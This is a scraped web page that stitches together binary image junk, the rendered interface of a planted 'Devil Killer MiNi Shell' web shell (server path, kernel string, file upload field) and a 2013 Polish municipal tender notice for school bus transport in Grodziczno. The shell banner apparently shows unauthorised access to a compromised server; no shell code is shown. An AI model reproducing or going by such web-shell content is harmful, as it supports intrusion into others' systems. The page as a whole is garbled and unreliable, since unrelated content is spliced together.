JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/269034-N-2013.html

<p class="kh_header"><b>Grodziczno: Świadczenie usług transportowych uczniów</b><br>
<b>Numer ogłoszenia: 269034 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodziczno , Grodziczno 17A, 13-324 Grodziczno, woj. warmińsko-mazurskie, tel. 056 4729126, faks 056 4729106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych uczniów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych uczniów. 
2.	Usługi transportowe uczniów dotyczą dowozu i odwozu uczniów uczęszczających do gimnazjów i szkół podstawowych na terenie Gminy Grodziczno oraz przewozu dzieci i młodzieży szkolnej nie związanego z dowozem na zajęcia szkolne.
3.	Przedmiot zamówienia został podzielony na 6 części i obejmuje szczegółowy wykaz tras transportu, minimalną ilość miejsc siedzących, liczbę uczniów dowożonych i odwożonych na poszczególnych trasach, ilość kilometrów na trasie.
4.	W częściach nr 1, nr 2, nr 3, nr 4 w liczonym limicie kilometrów nie jest liczony dojazd i odjazd środka transportu do miejsca wykonywania usługi. Koszt ten jest kosztem Wykonawcy. 
5.	W częściach nr 5 i nr 6 Wykonawca rozliczany będzie z miejsca wyjazdu i powrotu wyznaczonego przez Zamawiającego. 
6.	Miejsca siedzące to liczba miejsc na jaką zarejestrowany jest pojazd bez miejsc stojących.
7.	W poszczególnych częściach przedmiotu zamówienia obsługiwać będzie jeden pojazd z uwagi na przesunięcia czasowe.
8.	Wykonawca zobowiązany jest do punktualnego dowozu i odwozu uczniów. Wszyscy uczniowie dowiezieni do szkoły muszą być odwiezieni po zakończonych zajęciach.
9.	Wykonawca zobowiązany jest do zapewnienia bezpieczeństwa przewożonym dzieciom i młodzieży szkolnej.
10.	Wykonawca zobowiązany jest do zapewnienia zastępczego środka transportowego w razie awarii pojazdu lub innych przyczyn, którym dokonywany jest transport. Zastępczy środek transportowy musi spełniał warunki dla danej części przedmiotu zamówienia określone w niniejszej SIWZ. 
11.	Wykonawca zobowiązany jest  aby kierowca  posiadał uprawnienia do kierowania pojazdem, którym świadczona będzie usługa. 
12.	Wykonawca zobowiązany jest aby opiekun (osoba opiekująca się uczniami) posiadał kwalifikacje pedagogiczne i przeszkolenie z zakresu pierwszej pomocy przedmedycznej.
13.	Realizacja części nr 1, nr 2, nr 3, nr 4 przedmiotu zamówienia odbywać będzie się we wszystkie dni, w których będą odbywać się zajęcia szkolne. Realizacja części nr 5 i nr 6 przedmiotu zamówienia odbywać się będzie według potrzeb na zlecenie Zamawiającego. 
14.	Czas dowozu i odwozu wg tras w części nr 1, części nr 2, części nr 3, części nr 4  przedmiotu zamówienia będzie podany Wykonawcy, z którym podpisze Zamawiający umowę na realizację usługi, do dnia 31 sierpnia 2013 roku tj. przed rozpoczęciem roku szkolnego. Czas dowozu i odwozu według tras będzie dostosowany do realizowanych zajęć edukacyjnych i może ulec zmianie.
15.	Zamawiający wymaga dokumentowania przejechanych kilometrów. Wykazana ilość kilometrów w rachunku/fakturze nie może przekroczyć ilości kilometrów na danej trasie wykazanej do niniejszego postępowania. Do każdego rachunku/faktury za zrealizowaną usługę musi być dołączone zestawienie potwierdzone przez osobę upoważnioną przez Zamawiającego zgodne z zał. nr 8 do SIWZ.
16.	 Część nr 1 przedmiotu zamówienia: Świadczenie usług transportowych uczniów (Zespół Szkół w Nowym Grodzicznie, Szkoła Podstawowa w Zajączkowie).
Środek transportu  - minimum 50 miejsc siedzących 
TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, środa, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Wólka		
Mortęgi		
Wólka		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	50	16,90
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	33	5,80
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	7	5,30
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Wólka		
Mortęgi		
Wólka		
Zajączkowo szkoła		
RAZEM	45	12,40
Odwóz
Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Wólka	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	16,10
Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30
Odwóz [przebieg trasy poniedziałek, środa, piątek]
	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Wólka	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	16,90
Odwóz [przebieg trasy wtorek, środa, piątek]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40
Odwóz [przebieg trasy wtorek, środa, piątek]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40
Odwóz [przebieg trasy wtorek, środa]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki	
Rynek	
Ostaszewo	
Katlewo	
Białobłoty	
Zwiniarz	
Świniarc	
Tuszewo	
Montowo	
Grodziczno	
Linowiec	
Wólka	
Zajączkowo	
Kuligi	
RAZEM	42,00
TRASA II
Dowóz
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Wólka		
Mortęgi		
Wólka		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	50	16,90
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	33	5,80
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	7	5,30
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Wólka		
Mortęgi		
Wólka		
Zajączkowo szkoła		
RAZEM	45	12,40
Odwóz
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Wólka	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	16,10
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Wólka	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	16,90
Odwóz [przebieg trasy poniedziałek i czwartek]	Ilość km na trasie
Zajączkowo	
Wólka	
Mortęgi	
Wólka	
Nowe Grodziczno szkoła	
RAZEM	12,40
17.	Część nr 2 przedmiotu zamówienia: Świadczenie usług transportowych uczniów  ( Zespół Szkół w Nowym Grodzicznie, Szkoła Podstawowa w Montowie)
Środek transportu  - minimum 61 miejsc siedzących 
TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Rynek przystanek PKS		
Rynek szkoła		
Rynek skrzyżowanie		
Rynek pod Kiełpiny		
Ostaszewo Centrum Turystyczne		
Ostaszewo Rubalewski		
Katlewo skrzyżowanie		
Grodziczno Firański		
Nowe Grodziczno szkoła		
RAZEM	61	12,50
Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki skrzyżowanie		
Lorki wieś		
Nowe Grodziczno Góralski		
Nowe Grodziczno szkoła		
RAZEM	30	10,50
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Katlewo PGR		
Katlewo Lewandowski		
Katlewo skrzyżowanie 		
Montowo dworzec PKP		
Montowo szkoła		
RAZEM	26	8,80
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Montowo szkoła		
(droga żwirówka) Linowiec Karbowski		
Linowiec Seweryn		
Montowo figura		
Montowo szkoła		
RAZEM	17	10,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Rynek pod Kiełpiny	
Ostaszewo centrum turystyczne	
Ostaszewo Rubalewski	
Katlewo skrzyżowanie	
RAZEM	19,50
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec Seweryn	
Montowo figura	
Montowo dworzec PKP	
Katlewo PGR	
RAZEM	11,70
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Ostaszewo centrum turystyczne	
Ostaszewo Rubalewski	
Katlewo skrzyżowanie	
RAZEM	18,00
Odwóz [przebieg trasy poniedziałek, , środa, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec Seweryn	
Montowo figura	
Montowo dworzec PKP	
Katlewo PGR	
RAZEM	11,70
18.	Część nr 3 przedmiotu zamówienia: Świadczenie usług transportowych uczniów (Zespół Szkół w Mrocznie).
Środek transportu  - minimum 48 miejsc siedzących 
TRASA I

Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczno szkoła		
Mroczno góry		
Mroczno szkoła		
RAZEM	16	18,20
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczenko PKS wieś		
Mroczenko koło Dudulskiego		
Mroczenko koło jeziora		
Mroczno szkoła		
RAZEM	48	5,00
Odwóz 
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20
Odwóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20
Odwóz [przebieg trasy  środa]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20
TRASA II
Dowóz
Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Sugajenko wieś		
Sugajenko koło Romanowskich		
Sugajenko koło Miąskowskich		
Wybudowanie pod Sugajno		
Mroczno		
Mroczno szkoła		
RAZEM	35	13,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło krzyża	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	10,50
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło Miąskowskich	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00
19.	Część nr 4 przedmiotu zamówienia: Świadczenie usług transportowych uczniów (Zespół Szkół w Mrocznie).
Środek transportu  - minimum 43 miejsc siedzących 
TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kowaliki PKS		
Boleszyn		
Mroczno szkoła		
RAZEM	25	10,40
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40

TRASA II
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Trzcin		
Trzcin koło mostu		
Mroczno koło Sendwickiego		
Mroczno szkoła		
RAZEM	43	10,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00
Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00
20.	Część nr 5 przedmiotu zamówienia: Świadczenie usług transportowych uczniów (Przewóz dzieci i młodzieży szkolnej nie związany z dowozem na zajęcia szkolne). 
Środek transportu  - minimum 40 miejsc siedzących. Trasa transportu będzie zlecana każdorazowo według potrzeb Zamawiającego.
21.	 Część nr 6 przedmiotu zamówienia:  Świadczenie usług transportowych uczniów (Przewóz dzieci i młodzieży szkolnej nie związany z dowozem na zajęcia szkolne).
Środek transportu  - minimum 9 miejsc siedzących. Trasa transportu będzie zlecana każdorazowo według potrzeb Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W miarę potrzeb</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4, 60.17.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie licencji na wykonanie krajowego transportu drogowego osób  zgodnie  z ustawą  z  dnia  06.09.2001 roku o transporcie drogowym (Dz. U. z  2012 r. poz. 1265 z późniejszymi zmianami) ważną na cały okres realizacji przedmiotu zamówienia. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie wykazu niezbędnego do wykonania zamówienia taboru komunikacyjnego w ilości co najmniej 1 szt. z podaniem rodzaju i marki pojazdu, numeru rejestracyjnego pojazdu, ilości miejsc siedzących w pojeździe, właściciela pojazdu oraz daty ważności przeglądu technicznego pojazdu, którym dysponuje lub będzie dysponował Wykonawca.  Przegląd techniczny pojazdu musi być ważny na dzień składania oferty. Dla oferty częściowej nr 1 pojazd musi mieć minimum 50 miejsc siedzących, dla oferty częściowej nr 2 pojazd musi mieć minimum 61 miejsc siedzących, dla oferty n częściowej nr 3 pojazd musi mieć minimum 48 miejsc siedzących, dla oferty częściowej nr 4 pojazd musi mieć minimum 43 miejsc siedzących, dla oferty częściowej nr 5 pojazd musi mieć minimum 40 miejsc siedzących, dla oferty częściowej nr 6 pojazd musi mieć minimum 9 miejsc siedzących. Miejsca siedzące to liczba miejsc na jaką zarejestrowany jest pojazd bez miejsc stojących. Wykazanym potencjałem technicznym wykonawca musi świadczyć usługi w ramach przedmiotowego zamówienia publicznego. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Kierowca musi posiadać uprawnienia do kierowania pojazdem, którym świadczona jest usługa. Opiekun (osoba opiekująca się uczniami) musi posiadać kwalifikacje pedagogiczne i przeszkolenie z zakresu pierwszej pomocy przedmedycznej. Zamawiający nie wymaga opiekuna dla części nr 5 i nr 6 przedmiotu zamówienia. Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez złożenie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.  Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

